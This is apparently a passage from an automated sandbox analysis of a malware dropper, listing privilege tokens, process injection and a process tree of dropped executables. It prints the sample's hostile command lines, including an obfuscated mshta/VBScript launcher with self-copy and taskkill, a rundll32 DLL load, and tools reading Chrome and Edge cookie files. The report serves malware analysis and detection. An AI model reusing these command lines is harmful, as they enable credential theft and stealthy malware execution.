Token: SeAuditPrivilege 4996 askinstall53.exe Token: SeSystemEnvironmentPrivilege 4996 askinstall53.exe Token: SeChangeNotifyPrivilege 4996 askinstall53.exe Token: SeRemoteShutdownPrivilege 4996 askinstall53.exe Token: SeUndockPrivilege 4996 askinstall53.exe Token: SeSyncAgentPrivilege 4996 askinstall53.exe Token: SeEnableDelegationPrivilege 4996 askinstall53.exe Token: SeManageVolumePrivilege 4996 askinstall53.exe Token: SeImpersonatePrivilege 4996 askinstall53.exe Token: SeCreateGlobalPrivilege 4996 askinstall53.exe Token: 31 4996 askinstall53.exe Token: 32 4996 askinstall53.exe Token: 33 4996 askinstall53.exe Token: 34 4996 askinstall53.exe Token: 35 4996 askinstall53.exe Token: SeDebugPrivilege 2800 5632698.exe Token: SeDebugPrivilege 4456 Cleaner.exe Token: SeDebugPrivilege 1184 LivelyScreenRecS1.9.exe Token: SeDebugPrivilege 5584 6961886.exe Token: SeDebugPrivilege 5564 3010462.exe Token: SeDebugPrivilege 1676 tvwYgrb2f429aQuOGro1rbsa.exe Token: SeDebugPrivilege 1736 taskkill.exe Token: SeDebugPrivilege 4040 1029648.exe Token: SeDebugPrivilege 5432 1309205.exe Token: SeSecurityPrivilege 7164 msiexec.exe Token: SeCreateTokenPrivilege 3604 Cleaner Installation.exe Token: SeAssignPrimaryTokenPrivilege 3604 Cleaner Installation.exe Token: SeLockMemoryPrivilege 3604 Cleaner Installation.exe Token: SeIncreaseQuotaPrivilege 3604 Cleaner Installation.exe Token: SeMachineAccountPrivilege 3604 Cleaner Installation.exe Token: SeTcbPrivilege 3604 Cleaner Installation.exe Token: SeSecurityPrivilege 3604 Cleaner Installation.exe Token: SeTakeOwnershipPrivilege 3604 Cleaner Installation.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
Processes:
DpLRG_KNuUytQZuMpgd6PuVG.tmpCleaner Installation.exeInlog.tmpVPN.tmpWEATHER Manager.tmpConhost.exemsedge.exeGameBoxWin64.exeSetup.tmpEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.compid process 3108 DpLRG_KNuUytQZuMpgd6PuVG.tmp 3604 Cleaner Installation.exe 3872 Inlog.tmp 4644 VPN.tmp 3736 WEATHER Manager.tmp 6212 Conhost.exe 7012 msedge.exe 6984 GameBoxWin64.exe 7420 Setup.tmp 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 5348 Esplorarne.exe.com 5348 Esplorarne.exe.com 5348 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com 4092 Esplorarne.exe.com -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Esplorarne.exe.compid process 5348 Esplorarne.exe.com 5348 Esplorarne.exe.com 5348 Esplorarne.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (5).exezT7lzmRyAz5Sh_dhGoZkPLf_.exe6dBlR9ES_h9uZiKUQGcURO6C.exeO5TjB46UfglGUEdrVFJnqcV8.exedescription pid process target process PID 5116 wrote to memory of 2988 5116 Setup (5).exe O5TjB46UfglGUEdrVFJnqcV8.exe PID 5116 wrote to memory of 2988 5116 Setup (5).exe O5TjB46UfglGUEdrVFJnqcV8.exe PID 5116 wrote to memory of 2988 5116 Setup (5).exe O5TjB46UfglGUEdrVFJnqcV8.exe PID 5116 wrote to memory of 5036 5116 Setup (5).exe bp6rLacE0rY6LNrjOO_TxmEr.exe PID 5116 wrote to memory of 5036 5116 Setup (5).exe bp6rLacE0rY6LNrjOO_TxmEr.exe PID 5116 wrote to memory of 3060 5116 Setup (5).exe gwyroycDer67hXuPDw56Y8dx.exe PID 5116 wrote to memory of 3060 5116 Setup (5).exe gwyroycDer67hXuPDw56Y8dx.exe PID 5116 wrote to memory of 3060 5116 Setup (5).exe gwyroycDer67hXuPDw56Y8dx.exe PID 5116 wrote to memory of 3852 5116 Setup (5).exe GaGn0YZ1Xn4dsxDCBdKU27Z4.exe PID 5116 wrote to memory of 3852 5116 Setup (5).exe GaGn0YZ1Xn4dsxDCBdKU27Z4.exe PID 5116 wrote to memory of 3852 5116 Setup (5).exe GaGn0YZ1Xn4dsxDCBdKU27Z4.exe PID 5116 wrote to memory of 4568 5116 Setup (5).exe xmwrvdcY_Yfi3N5BkNTNaobs.exe PID 5116 wrote to memory of 4568 5116 Setup (5).exe xmwrvdcY_Yfi3N5BkNTNaobs.exe PID 5116 wrote to memory of 4568 5116 Setup (5).exe xmwrvdcY_Yfi3N5BkNTNaobs.exe PID 5116 wrote to memory of 4584 5116 Setup (5).exe NGSx7_M3OHWSeBxQFu9pEcYE.exe PID 5116 wrote to memory of 4584 5116 Setup (5).exe NGSx7_M3OHWSeBxQFu9pEcYE.exe PID 5116 wrote to memory of 4584 5116 Setup (5).exe NGSx7_M3OHWSeBxQFu9pEcYE.exe PID 5116 wrote to memory of 4576 5116 Setup (5).exe dfTxMY_IfJyT9BulZM6DJnA2.exe PID 5116 wrote to memory of 4576 5116 Setup (5).exe dfTxMY_IfJyT9BulZM6DJnA2.exe PID 5116 wrote to memory of 4576 5116 Setup (5).exe dfTxMY_IfJyT9BulZM6DJnA2.exe PID 5116 wrote to memory of 4560 5116 Setup (5).exe t7Xvr_mcY4U0EgrksDdHs2hI.exe PID 5116 wrote to memory of 4560 5116 Setup (5).exe t7Xvr_mcY4U0EgrksDdHs2hI.exe PID 5116 wrote to memory of 4560 5116 Setup (5).exe t7Xvr_mcY4U0EgrksDdHs2hI.exe PID 5116 wrote to memory of 2464 5116 Setup (5).exe DeXoDhHO4fs8ErAGxqZ46K2p.exe PID 5116 wrote to memory of 2464 5116 Setup (5).exe DeXoDhHO4fs8ErAGxqZ46K2p.exe PID 5116 wrote to memory of 2464 5116 Setup (5).exe DeXoDhHO4fs8ErAGxqZ46K2p.exe PID 5116 wrote to memory of 2344 5116 Setup (5).exe 4TxEGrcFaLMUzJf7EnXhU_B_.exe PID 5116 wrote to memory of 2344 5116 Setup (5).exe 4TxEGrcFaLMUzJf7EnXhU_B_.exe PID 5116 wrote to memory of 2344 5116 Setup (5).exe 4TxEGrcFaLMUzJf7EnXhU_B_.exe PID 5116 wrote to memory of 3896 5116 Setup (5).exe BfG52BypxnLPuragVMr93q4y.exe PID 5116 wrote to memory of 3896 5116 Setup (5).exe BfG52BypxnLPuragVMr93q4y.exe PID 5116 wrote to memory of 3896 5116 Setup (5).exe BfG52BypxnLPuragVMr93q4y.exe PID 5116 wrote to memory of 3104 5116 Setup (5).exe W4sDxcb8D309KQCgTNmXJRUk.exe PID 5116 wrote to memory of 3104 5116 Setup (5).exe W4sDxcb8D309KQCgTNmXJRUk.exe PID 5116 wrote to memory of 3104 5116 Setup (5).exe W4sDxcb8D309KQCgTNmXJRUk.exe PID 5116 wrote to memory of 3684 5116 Setup (5).exe kWs5sSjR4k3xXHmO4XLag8d6.exe PID 5116 wrote to memory of 3684 5116 Setup (5).exe kWs5sSjR4k3xXHmO4XLag8d6.exe PID 5116 wrote to memory of 3684 5116 Setup (5).exe kWs5sSjR4k3xXHmO4XLag8d6.exe PID 5116 wrote to memory of 4984 5116 Setup (5).exe zT7lzmRyAz5Sh_dhGoZkPLf_.exe PID 5116 wrote to memory of 4984 5116 Setup (5).exe zT7lzmRyAz5Sh_dhGoZkPLf_.exe PID 5116 wrote to memory of 4984 5116 Setup (5).exe zT7lzmRyAz5Sh_dhGoZkPLf_.exe PID 5116 wrote to memory of 1888 5116 Setup (5).exe 6dBlR9ES_h9uZiKUQGcURO6C.exe PID 5116 wrote to memory of 1888 5116 Setup (5).exe 6dBlR9ES_h9uZiKUQGcURO6C.exe PID 5116 wrote to memory of 1888 5116 Setup (5).exe 6dBlR9ES_h9uZiKUQGcURO6C.exe PID 5116 wrote to memory of 3272 5116 Setup (5).exe pIQ3ulIMRDHkTcxzXZA50m3y.exe PID 5116 wrote to memory of 3272 5116 Setup (5).exe pIQ3ulIMRDHkTcxzXZA50m3y.exe PID 5116 wrote to memory of 3272 5116 Setup (5).exe pIQ3ulIMRDHkTcxzXZA50m3y.exe PID 5116 wrote to memory of 968 5116 Setup (5).exe JReCxrSZ5O_Lnjfb2WaAEeOU.exe PID 5116 wrote to memory of 968 5116 Setup (5).exe JReCxrSZ5O_Lnjfb2WaAEeOU.exe PID 5116 wrote to memory of 968 5116 Setup (5).exe JReCxrSZ5O_Lnjfb2WaAEeOU.exe PID 4984 wrote to memory of 1624 4984 zT7lzmRyAz5Sh_dhGoZkPLf_.exe mshta.exe PID 4984 wrote to memory of 1624 4984 zT7lzmRyAz5Sh_dhGoZkPLf_.exe mshta.exe PID 4984 wrote to memory of 1624 4984 zT7lzmRyAz5Sh_dhGoZkPLf_.exe mshta.exe PID 1888 wrote to memory of 3696 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe jooyu.exe PID 1888 wrote to memory of 3696 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe jooyu.exe PID 1888 wrote to memory of 3696 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe jooyu.exe PID 5116 wrote to memory of 1068 5116 Setup (5).exe DpLRG_KNuUytQZuMpgd6PuVG.exe PID 5116 wrote to memory of 1068 5116 Setup (5).exe DpLRG_KNuUytQZuMpgd6PuVG.exe PID 5116 wrote to memory of 1068 5116 Setup (5).exe DpLRG_KNuUytQZuMpgd6PuVG.exe PID 1888 wrote to memory of 2256 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe md8_8eus.exe PID 1888 wrote to memory of 2256 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe md8_8eus.exe PID 1888 wrote to memory of 2256 1888 6dBlR9ES_h9uZiKUQGcURO6C.exe md8_8eus.exe PID 2988 wrote to memory of 3396 2988 O5TjB46UfglGUEdrVFJnqcV8.exe O5TjB46UfglGUEdrVFJnqcV8.exe PID 2988 wrote to memory of 3396 2988 O5TjB46UfglGUEdrVFJnqcV8.exe O5TjB46UfglGUEdrVFJnqcV8.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Users\Admin\Documents\DeXoDhHO4fs8ErAGxqZ46K2p.exe"C:\Users\Admin\Documents\DeXoDhHO4fs8ErAGxqZ46K2p.exe"2⤵
- Executes dropped EXE
PID:2464 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2932 -
C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe"C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4560 -
C:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exeC:\Users\Admin\Documents\t7Xvr_mcY4U0EgrksDdHs2hI.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4804 -
C:\Users\Admin\Documents\dfTxMY_IfJyT9BulZM6DJnA2.exe"C:\Users\Admin\Documents\dfTxMY_IfJyT9BulZM6DJnA2.exe"2⤵
- Executes dropped EXE
PID:4576 -
C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe"C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4584 -
C:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exeC:\Users\Admin\Documents\NGSx7_M3OHWSeBxQFu9pEcYE.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Users\Admin\Documents\xmwrvdcY_Yfi3N5BkNTNaobs.exe"C:\Users\Admin\Documents\xmwrvdcY_Yfi3N5BkNTNaobs.exe"2⤵
- Executes dropped EXE
PID:4568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1288 -
C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe"C:\Users\Admin\Documents\GaGn0YZ1Xn4dsxDCBdKU27Z4.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3852 -
C:\Users\Admin\Documents\bp6rLacE0rY6LNrjOO_TxmEr.exe"C:\Users\Admin\Documents\bp6rLacE0rY6LNrjOO_TxmEr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Users\Admin\AppData\Roaming\1480338.exe"C:\Users\Admin\AppData\Roaming\1480338.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4720 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 24364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7544 -
C:\Users\Admin\AppData\Roaming\5632698.exe"C:\Users\Admin\AppData\Roaming\5632698.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Users\Admin\AppData\Roaming\3678300.exe"C:\Users\Admin\AppData\Roaming\3678300.exe"3⤵PID:2584
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4980 -
C:\Users\Admin\AppData\Roaming\4175631.exe"C:\Users\Admin\AppData\Roaming\4175631.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4676 -s 23244⤵
- Program crash
PID:5128 -
C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe"C:\Users\Admin\Documents\gwyroycDer67hXuPDw56Y8dx.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060 -
C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe"C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe"C:\Users\Admin\Documents\O5TjB46UfglGUEdrVFJnqcV8.exe" -q3⤵
- Executes dropped EXE
PID:3396 -
C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe"C:\Users\Admin\Documents\4TxEGrcFaLMUzJf7EnXhU_B_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Users\Admin\Documents\kWs5sSjR4k3xXHmO4XLag8d6.exe"C:\Users\Admin\Documents\kWs5sSjR4k3xXHmO4XLag8d6.exe"2⤵
- Executes dropped EXE
PID:3684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 3163⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4744 -
C:\Users\Admin\Documents\W4sDxcb8D309KQCgTNmXJRUk.exe"C:\Users\Admin\Documents\W4sDxcb8D309KQCgTNmXJRUk.exe"2⤵
- Executes dropped EXE
PID:3104 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2528 -
C:\Users\Admin\Documents\BfG52BypxnLPuragVMr93q4y.exe"C:\Users\Admin\Documents\BfG52BypxnLPuragVMr93q4y.exe"2⤵
- Executes dropped EXE
PID:3896 -
C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe"C:\Users\Admin\Documents\pIQ3ulIMRDHkTcxzXZA50m3y.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272 -
C:\Users\Admin\Documents\6dBlR9ES_h9uZiKUQGcURO6C.exe"C:\Users\Admin\Documents\6dBlR9ES_h9uZiKUQGcURO6C.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:3696 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3016
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2256 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:3368 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5036 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3644
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5256 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3032
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7272
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2652
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6180
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7208
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:924
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6248
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2384
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7540
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2732
-
C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:1624
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\zT7lzmRyAz5Sh_dhGoZkPLf_.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:3408
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵PID:3676
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵PID:2876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:4812
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
PID:4404 -
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zT7lzmRyAz5Sh_dhGoZkPLf_.exe"5⤵
- Kills process with taskkill
